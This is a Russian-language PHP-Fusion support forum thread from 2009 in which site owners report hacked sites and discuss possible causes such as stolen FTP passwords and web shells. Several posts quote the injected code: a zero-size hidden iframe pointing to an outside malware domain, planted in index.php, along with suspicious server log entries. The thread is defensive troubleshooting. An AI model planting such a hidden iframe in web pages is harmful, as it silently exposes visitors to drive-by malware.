Ломают сайты!! - PHP-Fusion SF Russian Support Site

Регистрация

Забыли пароль?

Правила форума

FAQ (читать перед созданием новой темы)

Просмотр темы

Вернуться на сайт: PHP-Fusion SF Russian Support Site

Форум поддержки PHP-Fusion SF | PHP-Fusion SF - Разное | Флейм

# 1 Тема: Ломают сайты!!

Djooood
Пользователь

Avatar пользователя

Мой статус

Местный

Сообщений: 12
Зарегистрирован: 18 Февраля 2008, 01:21:22
Сказали спасибо 1 раз
Статус: offline
ICQ статус

455103816

Опубликовано 27 Января 2009, 05:19:30

Кто нибудь сталкивался с таким ломают сайты на phpfusion

изменяют index.php

<?php

<iframe src="http://wuorz.cn/kz7i1/fi24/" width="0" height="0" frameborder="0"></iframe>

/*---------------------------------------------------+

| PHP-Fusion 6 Content Management System

+----------------------------------------------------+

| Copyright © 2002 - 2006 Nick Jones

| http://www.php-fusion.co.uk/

+----------------------------------------------------+

| Released under the terms & conditions of v2 of the

| GNU General Public License. For details refer to

| the included gpl.txt file or visit http://gnu.org

+----------------------------------------------------+

| Modified by PHP-Fusion SF Group

| Copyright © 2007 by SF

| http://www.rus-phpfusion.com/

+----------------------------------------------------*/

<? include ("subnext.php");?>

if (file_exists('config.php') || @filesize('config.php')>0)

{

	require_once "maincore.php";

include("err.php");



	if ($settings['opening_page'] == "news.php") {

	$settings['opening_page'] = (strrchr(FUSION_SELF,"/") == "index.php" ? "index.php" : "");

	include "news.php";

	}else{

	redirect($settings['opening_page']);

	}

}

else

{

	header ('Location:setup.php');

}

?>



<? include ("subnext.php");?>



<iframe src="http://wuorz.cn/kz7i1/fi24/" width="0" height="0" frameborder="0"></iframe>

внедряют код

<iframe src="http://wuorz.cn/kz7i1/fi24/" width="0" height="0" frameborder="0"></iframe>

причём на этом сайте вирус!!!

версия была v6.01.16.4
сломали у меня лично 3 сайта
и у организации 1.
Кто знает какисм образом это могло произойти?
Анализ логов веб сервера ничегоне показал...
Добавляю навсякий случай лог сервера.(Мож кто что увидит)
85.173.88.190 - это я

Прикрепленные файлы

Для просмотра вложения зарегистрируйтесь

[Изменил(а) Djooood, 27 Января 2009, 05:20:28]

--------------------
Блог города Аксай

http://aksay-now.ru/

^ наверх ^

455103816

http://aksay-now.ru/

Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline

Опубликовано 27 Января 2009, 05:57:36

что Я тебе могу на это сказать... ругать уже устал... писать в чем проблема тоже... в поиск посылать вас бесполезно... вот что делать?
-------------------- Я в контакте Народ читаем и запоминаем! Не помогаю по ICQ Не помогаю по ЛС буду просто игнорировать эти сообщения! Все вопросы задаем на форуме, но предварительно пользуемся поиском!

^ наверх ^

1 пользователь сказал спасибо Вам: Djooood

LioN
Пользователь

Avatar пользователя

Админ

Завсегдатый

Сообщений: 52
Откуда: Россия\ Воронеж
Зарегистрирован: 04 Декабря 2008, 19:52:51
Сказали спасибо 2 раз
Статус: offline
ICQ статус

394107181

Опубликовано 28 Января 2009, 16:25:38

т.е они знают ошибки фъюжина ? или как то через бд?

^ наверх ^

394107181

1 пользователь сказал спасибо Вам: Djooood

dr56
SF Team

Avatar пользователя

SF Support Team

Любитель Fusion

Сообщений: 374
Зарегистрирован: 29 Августа 2008, 15:35:03
Сказали спасибо 25 раз
Статус: offline

Опубликовано 28 Января 2009, 21:15:47

читайте новости

^ наверх ^

1 пользователь сказал спасибо Вам: Djooood

steelcat
Пользователь

Avatar пользователя

новичек

Сообщений: 5
Зарегистрирован: 01 Марта 2009, 21:10:47
Сказали спасибо 1 раз
Статус: offline

Опубликовано 01 Марта 2009, 21:15:28

Djooood написал:
Кто нибудь сталкивался с таким ломают сайты на phpfusion

изменяют index.php

[code]<?php
<iframe src="http://wuorz.cn/kz7i1/fi24/" width="0" height="0" frameborder="0"></iframe>

Друг, ломанули сначала комп, с которого на ftp есть доступ и пароль сохранен скорее всего. А бороться надо прежде всего с вирусами на своем компе. Данная зараза может в виде autorun распространяться на флешках.

^ наверх ^

1 пользователь сказал спасибо Вам: Djooood

yury
Пользователь

Avatar пользователя

Магистр Дизайна и Верстки

Почетный SF

Сообщений: 1201
Зарегистрирован: 11 Января 2008, 15:57:19
Сказали спасибо 37 раз
Статус: offline
ICQ статус

371635405

Опубликовано 02 Марта 2009, 00:05:00

во первых следите за обновлениями, раз выбрали движок. Во вторых чаще ломают забросив файл шел и через него управляют файлами, можно сломать через соседний аккуант, сломать сам сервак, может твои друзья прикалываются, если знают пароль...
Выбирай вариант...

--------------------
Нужен сайт или красивый оригинальный дизайн?
Только лучший и оригинальный дизайн для php-fusion 6, 7, SF!
www.artcell.ru-правильный выбор!!!

^ наверх ^

371635405

www.artcell.ru

1 пользователь сказал спасибо Вам: Djooood

Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 13:15:07
Сказали спасибо 353 раз
Статус: offline

Опубликовано 02 Марта 2009, 17:54:54

При нормальных правах доступа можно ли шелом поправить файл?
-------------------- Retired

^ наверх ^

1 пользователь сказал спасибо Вам: Djooood

cmGz
Пользователь

Avatar пользователя

Местный

Сообщений: 13
Зарегистрирован: 21 Апреля 2008, 06:09:01
Сказали спасибо 2 раз
Статус: offline

Опубликовано 20 Апреля 2009, 04:44:45

Да ломают, такая-же фтигня добавляют iframe, в некоторых файлах при попытки скачать на комп обнаружены вирусы

^ наверх ^

Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 13:15:07
Сказали спасибо 353 раз
Статус: offline

Опубликовано 20 Апреля 2009, 08:19:10

cmGz логи можешь предоставить для разбора? Реально я вижу - одни крики что кого то как то ломают, а что бы что то изменить - даже логи никто не посмотрит.
-------------------- Retired

^ наверх ^

1 пользователь сказал спасибо Вам: Djooood

Djooood
Пользователь

Avatar пользователя

Мой статус

Местный

Сообщений: 12
Зарегистрирован: 18 Февраля 2008, 01:21:22
Сказали спасибо 1 раз
Статус: offline
ICQ статус

455103816

Опубликовано 20 Апреля 2009, 12:15:50

Psc написал: cmGz логи можешь предоставить для разбора? Реально я вижу - одни крики что кого то как то ломают, а что бы что то изменить - даже логи никто не посмотрит. логи в первом посте есть
-------------------- Блог города Аксай http://aksay-now.ru/

^ наверх ^

455103816

http://aksay-now.ru/

Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 13:15:07
Сказали спасибо 353 раз
Статус: offline

Опубликовано 20 Апреля 2009, 13:28:27

Djooood твои логи чистые. Это точно ТЕ логи?

В них есть только: перебор форумов, несколько отправок сообщений на ид=1 (XSS?) все неудачные (404) + попытка надыбать статистику.

так же несколько странных вещей:
69.80.244.163 - - [17/Dec/2008:14:54:21 +0300] "GET /%26 HTTP/1.0" 404 139 - символ & возможно случайный.

79.172.68.92 - - [19/Dec/2008:12:49:50 +0300] "GET /register.php+%5BPLM=0%5D%5BR%5D+GET+http://businclub.ru/register.php+%5B0,24318,544%5D+-%3E+%5BR%5D+POST+http://businclub.ru/register.php+%5B0,0,1253
6%5D HTTP/1.0" 404 139 - аяксовый мод регистрации?

67.228.111.202 - - [24/Dec/2008:06:59:18 +0300] "GET /?id=1768&img=bekijk HTTP/1.0" 200 42003 - параноидальная склонность к слову bekijk + неверная ссылка (особо неверная)

81.19.66.84 - - [08/Jan/2009:13:41:55 +0300] "GET /infusions/stats_info_panel/index.php?img=bekijk&id=632 HTTP/1.0" 200 13241 - оно же

Рекомендую поставить защитный плаг, либо поинтересоваться может это хостинг такой...

[Изменил(а) Psc, 20 Апреля 2009, 13:29:07]

--------------------
Retired

^ наверх ^

Перейти на форум:

95,112,974 уникальных посетителей
сейчас: 25 Апреля 2024, 14:13:27
Генерация страницы: 0.28 сек.